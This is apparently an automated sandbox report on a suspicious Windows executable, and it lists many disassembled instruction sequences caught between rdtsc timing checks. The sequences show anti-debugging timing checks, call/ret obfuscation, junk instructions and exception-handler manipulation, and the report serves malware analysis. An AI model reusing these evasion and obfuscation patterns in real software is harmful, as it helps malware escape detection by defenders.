Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100EB17 second address: 100EBCF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F70146AC606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F70146AC617h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F70146AC608h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push eax 0x0000002e jo 00007F70146AC60Ch 0x00000034 and edi, 717E7836h 0x0000003a pop ebx 0x0000003b push dword ptr fs:[00000000h] 0x00000042 mov di, E300h 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d mov edi, 38EF9651h 0x00000052 mov eax, dword ptr [ebp+122D0EE9h] 0x00000058 jmp 00007F70146AC60Fh 0x0000005d push FFFFFFFFh 0x0000005f push 00000000h 0x00000061 push esi 0x00000062 call 00007F70146AC608h 0x00000067 pop esi 0x00000068 mov dword ptr [esp+04h], esi 0x0000006c add dword ptr [esp+04h], 00000016h 0x00000074 inc esi 0x00000075 push esi 0x00000076 ret 0x00000077 pop esi 0x00000078 ret 0x00000079 mov dword ptr [ebp+12446E19h], esi 0x0000007f nop 0x00000080 push eax 0x00000081 push edx 0x00000082 jng 00007F70146AC60Ch 0x00000088 jne 00007F70146AC606h 0x0000008e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100FC28 second address: 100FC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 100EBCF second address: 100EBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1012A6B second address: 1012A7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10140D0 second address: 10140D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101422E second address: 101423C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10151C7 second address: 101526F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jp 00007F70146AC609h 0x00000011 add bl, 0000003Ah 0x00000014 push dword ptr fs:[00000000h] 0x0000001b or bx, 2FBAh 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F70146AC608h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000015h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+122D1735h] 0x00000047 jmp 00007F70146AC615h 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push ecx 0x00000051 call 00007F70146AC608h 0x00000056 pop ecx 0x00000057 mov dword ptr [esp+04h], ecx 0x0000005b add dword ptr [esp+04h], 00000017h 0x00000063 inc ecx 0x00000064 push ecx 0x00000065 ret 0x00000066 pop ecx 0x00000067 ret 0x00000068 mov bl, 9Fh 0x0000006a call 00007F70146AC617h 0x0000006f movsx ebx, bx 0x00000072 pop ebx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 jg 00007F70146AC606h 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101526F second address: 1015275 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1015275 second address: 101527B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101709D second address: 10170A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018247 second address: 101824D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101A329 second address: 101A3B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jno 00007F7014CC2CC3h 0x00000012 jmp 00007F7014CC2CBDh 0x00000017 nop 0x00000018 sbb ebx, 15D03CE5h 0x0000001e mov dword ptr [ebp+122D22F1h], eax 0x00000024 push 00000000h 0x00000026 pushad 0x00000027 mov di, si 0x0000002a mov cx, 2971h 0x0000002e popad 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F7014CC2CB8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b pushad 0x0000004c mov esi, dword ptr [ebp+122D34F9h] 0x00000052 popad 0x00000053 jg 00007F7014CC2CBCh 0x00000059 xchg eax, esi 0x0000005a jc 00007F7014CC2CE0h 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F7014CC2CC1h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1018380 second address: 101838A instructions: 0x00000000 rdtsc 0x00000002 js 00007F70146AC606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101B392 second address: 101B396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101B396 second address: 101B3A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101B3A9 second address: 101B3AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101B3AF second address: 101B3C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F70146AC606h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101C456 second address: 101C45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101C45B second address: 101C4CC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F70146AC60Fh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F70146AC608h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 jmp 00007F70146AC612h 0x0000002d push 00000000h 0x0000002f add edi, dword ptr [ebp+122D27FAh] 0x00000035 push 00000000h 0x00000037 cmc 0x00000038 mov dword ptr [ebp+122D1DC0h], ebx 0x0000003e xchg eax, esi 0x0000003f push ebx 0x00000040 push eax 0x00000041 jg 00007F70146AC606h 0x00000047 pop eax 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101C4CC second address: 101C4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101C61A second address: 101C620 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 101C620 second address: 101C6C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F7014CC2CBAh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F7014CC2CB8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push edx 0x00000029 xor dword ptr [ebp+122D56B6h], ecx 0x0000002f pop ebx 0x00000030 push dword ptr fs:[00000000h] 0x00000037 jnl 00007F7014CC2CB7h 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 push 00000000h 0x00000046 push ebx 0x00000047 call 00007F7014CC2CB8h 0x0000004c pop ebx 0x0000004d mov dword ptr [esp+04h], ebx 0x00000051 add dword ptr [esp+04h], 0000001Bh 0x00000059 inc ebx 0x0000005a push ebx 0x0000005b ret 0x0000005c pop ebx 0x0000005d ret 0x0000005e mov dword ptr [ebp+122D2867h], esi 0x00000064 mov eax, dword ptr [ebp+122D1745h] 0x0000006a mov dword ptr [ebp+12453B20h], edx 0x00000070 push FFFFFFFFh 0x00000072 mov dword ptr [ebp+122D18FEh], esi 0x00000078 nop 0x00000079 ja 00007F7014CC2CC3h 0x0000007f push eax 0x00000080 push ecx 0x00000081 push eax 0x00000082 push edx 0x00000083 push esi 0x00000084 pop esi 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10256DB second address: 10256EA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F70146AC606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102936D second address: 1029371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1029371 second address: 1029377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1029377 second address: 102937D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102937D second address: 1029381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102E428 second address: 102E42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102E42F second address: 102E45A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F70146AC60Ch 0x00000008 jbe 00007F70146AC606h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F70146AC616h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 102E45A second address: 102E468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1034118 second address: 103411C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103411C second address: 1034132 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7014CC2CBEh 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1034132 second address: 1034136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1034136 second address: 103413C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1034878 second address: 103487E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103487E second address: 1034882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1034E27 second address: 1034E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1034FB5 second address: 103500D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push ecx 0x00000008 jng 00007F7014CC2CB6h 0x0000000e pop ecx 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 jne 00007F7014CC2CBEh 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d jns 00007F7014CC2CB6h 0x00000023 jmp 00007F7014CC2CBEh 0x00000028 jmp 00007F7014CC2CBEh 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 jmp 00007F7014CC2CC5h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103AC47 second address: 103AC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103AC50 second address: 103AC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBB998 second address: FBB9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F70146AC606h 0x0000000a popad 0x0000000b je 00007F70146AC60Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBB9AB second address: FBB9B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10396D1 second address: 10396D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1039829 second address: 1039833 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1039972 second address: 10399A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC615h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70146AC616h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10399A3 second address: 10399D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F7014CC2CC7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7014CC2CC4h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10399D9 second address: 10399DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10399DF second address: 10399EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1039B42 second address: 1039B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1039C82 second address: 1039C90 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103A108 second address: 103A117 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F70146AC606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103A3BF second address: 103A3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103A3C8 second address: 103A3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103A3D3 second address: 103A3D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103A3D9 second address: 103A3DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103A524 second address: 103A535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007F7014CC2CB6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103A535 second address: 103A539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103A539 second address: 103A53F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103A53F second address: 103A54A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103A54A second address: 103A550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103A693 second address: 103A6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70146AC617h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103AAC0 second address: 103AAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CC0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103AAD4 second address: 103AAE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC60Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103AAE3 second address: 103AAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 103AAE9 second address: 103AAF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1041449 second address: 104144D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 104144D second address: 1041451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1040E99 second address: 1040EAF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F7014CC2CC0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1040EAF second address: 1040ED4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F70146AC616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F70146AC606h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1040ED4 second address: 1040ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10466D0 second address: 10466D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFDEA9 second address: FFDEC6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7014CC2CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F7014CC2CB8h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007F7014CC2CB6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFDEC6 second address: FFDECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFDECA second address: FFDFB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F7014CC2CB8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 mov di, bx 0x00000025 mov dword ptr [ebp+122D287Fh], ecx 0x0000002b push dword ptr fs:[00000000h] 0x00000032 or edx, 53F6E934h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f adc dx, 2C55h 0x00000044 mov dword ptr [ebp+12471B19h], esp 0x0000004a movzx edi, ax 0x0000004d cmp dword ptr [ebp+122D33DDh], 00000000h 0x00000054 jne 00007F7014CC2DAAh 0x0000005a jmp 00007F7014CC2CC6h 0x0000005f mov byte ptr [ebp+122D27FFh], 00000047h 0x00000066 sub cl, 0000002Ch 0x00000069 call 00007F7014CC2CC5h 0x0000006e jmp 00007F7014CC2CC6h 0x00000073 pop edx 0x00000074 mov eax, D49AA7D2h 0x00000079 mov dword ptr [ebp+122D1C42h], edx 0x0000007f nop 0x00000080 jnl 00007F7014CC2CCBh 0x00000086 jmp 00007F7014CC2CC5h 0x0000008b push eax 0x0000008c push edx 0x0000008d push eax 0x0000008e push edx 0x0000008f jmp 00007F7014CC2CC0h 0x00000094 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE296 second address: FFE2A0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F70146AC60Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE475 second address: FFE491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7014CC2CC7h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE491 second address: FFE497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE497 second address: FFE49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE49B second address: FFE4C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70146AC611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F70146AC610h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE4C6 second address: FFE4EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F7014CC2CC4h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE4EB second address: FFE4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FFE5C8 second address: FFE5EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7014CC2CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
